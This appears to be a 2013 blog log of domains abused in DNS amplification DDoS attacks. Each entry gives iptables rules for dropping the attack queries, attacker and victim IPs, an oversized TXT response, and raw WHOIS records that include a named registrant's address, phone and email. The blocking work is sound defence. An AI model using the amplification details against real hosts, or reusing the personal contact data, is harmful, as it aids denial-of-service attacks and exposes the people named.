>>> Last update of WHOIS database: 2013-11-10T01:27:38Z <<<

Reseller Email:
Reseller URL:

Personal data access and use are governed by French law, any use for
the purpose of unsolicited mass commercial advertising as well as any
mass or automated inquiries (for any intent other than the
registration or modification of a domain name) are strictly forbidden.
Copy of whole or part of our database without Gandi's endorsement is
strictly forbidden.
The owner of a domain is the person specified as "Registrant Name" for
a natural person and "Registrant Organization" for a legal person.
Domain ownership disputes should be settled using ICANN's Uniform
Dispute Resolution Policy: http://www.icann.org/en/help/dndr#udrp



Thursday, November 7, 2013

Domain: loo1.ru

Domain: loo1.ru

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFDFDF=0x044c4f4f && 0x2c&0xFFFFDFDF=0x31025255 && 0x30&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q loo1.ru"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 49 --algo bm --hex-string '|046c6f6f3102727500|' -j DROP -m comment --comment "DROP DNS Q loo1.ru"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


93.174.93.217 - Ecatel

Name server:


;; ANSWER SECTION:
loo1.ru. 21600 IN NS ns1.reg.ru.
loo1.ru. 21600 IN NS ns2.reg.ru.


Response:


A 231
NS 2
SOA 1
Rsize 3792


Whois



domain: LOO1.RU
nserver: ns1.reg.ru.
nserver: ns2.reg.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2013.10.17
paid-till: 2014.10.17
free-date: 2014.11.17
source: TCI

Last updated on 2013.11.08 01:41:36 MSK




Wednesday, November 6, 2013

Domain: t.pbub.info

Domain: t.pbub.info

Domain with a personal touch!

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:


There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFFDFFFDF=0x01540450 && 0x2c&0xDFDFDFFF=0x42554204 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q t.pbub.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 40 --to 53 --algo bm --hex-string '|0174047062756204696e666f00|' -j DROP -m comment --comment "DROP DNS Q t.pbub.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:

Source unknown.

Attacked the following IP:

 45,783x   186.2.161.7 - ddos-guard.net


Name server:

bub.info.               21600   IN      NS      c1.wpns.hosteurope.de.
bub.info.               21600   IN      NS      c1.wsns.hosteurope.de.

Response:


TXT 1
Rsize 3896


Very interesting response containing (almost) my blog name:

------------------

t.pbub.info.            86400   IN      TXT     "dnsamplification.blogspot.com-d                                                                                                            nsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blog                                                                                                            spot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplific                                                                                                            ation.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification                                                                                                            .blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamp                                                                                                            lification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.                                                                                                            com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "d                                                                                                            nsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blog                                                                                                            spot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplific                                                                                                            ation.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                                                                                                            nsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamp                                                                                                            lification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.                                                                                                            com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification                                                                                                            .blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blog                                                                                                            spot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplific                                                                                                            ation.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                                                                                                            nsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamp                                                                                                            lification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.                                                                                                            com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification                                                                                                            .blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blog                                                                                                            spot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplific                                                                                                            ation.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                                                                                                            nsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamp                                                                                                            lification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.                                                                                                            com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification                                                                                                            .blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamp                                                                                                            li" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplific                                                                                                            ation.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                                                                                                            nsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blog                                                                                                            spot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.                                                                                                            com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification                                                                                                            .blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamp                                                                                                            lification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplific                                                                                                            ation.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                                                                                                            nsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blog                                                                                                            spot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.                                                                                                            com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification                                                                                                            .blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamp                                                                                                            lification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplific                                                                                                            ation.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                                                                                                            nsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blog                                                                                                            spot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" "                                                                                                            >" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification                                                                                                            .blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamp                                                                                                            lification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.                                                                                                            com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                                                                                                            nsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blog                                                                                                            spot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplific                                                                                                            ation.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification                                                                                                            .blogspot.com-dnsamplification.blogspot.com
------------

Oh recognition at last! /sarcasm

Whois


Domain ID:D311-LRMS
Domain Name:BUB.INFO
Created On:25-Jul-2001 16:36:25 UTC
Last Updated On:20-Sep-2013 20:45:10 UTC
Expiration Date:25-Jul-2014 16:36:25 UTC
Trademark Name:BUB
Trademark Date:1979-12-05
Trademark Country:DE
Trademark Number:994458 Deutsches Patentamt Muenchen
Sponsoring Registrar:Mesh Digital Limited (R517-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:MNT87F29245123
Registrant Name:Stephan Sehlhoff
Registrant Organization:BUB Berater-Cooperation
Registrant Street1:Hauptstr. 340
Registrant Street2:BUB Berater-Cooperation
Registrant Street3:
Registrant City:Leopoldshoehe
Registrant State/Province:
Registrant Postal Code:33818
Registrant Country:DE
Registrant Phone:+49.520298360
Registrant Phone Ext.:
Registrant FAX:+49.5202983620
Registrant FAX Ext.:
Registrant Email:info@bauwirtschaft.de
Admin ID:MNT53F29245126
Admin Name:Stephan Sehlhoff
Admin Organization:BUB Berater-Cooperation
Admin Street1:Hauptstr. 340
Admin Street2:
Admin Street3:
Admin City:Leopoldshoehe
Admin State/Province:
Admin Postal Code:33818
Admin Country:DE
Admin Phone:+49.520298360
Admin Phone Ext.:
Admin FAX:+49.5202983620
Admin FAX Ext.:
Admin Email:info@bauwirtschaft.de
Billing ID:MNT2CF29245129
Billing Name:Hostmaster Domain-Registration
Billing Organization:Host Europe GmbH
Billing Street1:Welserstrasse 14
Billing Street2:Host Europe GmbH
Billing Street3:
Billing City:Koeln
Billing State/Province:NRW
Billing Postal Code:51149
Billing Country:DE
Billing Phone:+49.1805467838
Billing Phone Ext.:
Billing FAX:+49.1805663233
Billing FAX Ext.:
Billing Email:support@hosteurope.de
Tech ID:MNT48029245132
Tech Name:Hostmaster Domain-Registration
Tech Organization:Host Europe GmbH
Tech Street1:Welserstrasse 14
Tech Street2:Host Europe GmbH
Tech Street3:
Tech City:Koeln
Tech State/Province:NRW
Tech Postal Code:51149
Tech Country:DE
Tech Phone:+49.1805467838
Tech Phone Ext.:
Tech FAX:+49.1805663233
Tech FAX Ext.:
Tech Email:support@hosteurope.de
Name Server:C1.WPNS.HOSTEUROPE.DE
Name Server:C1.WSNS.HOSTEUROPE.DE
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server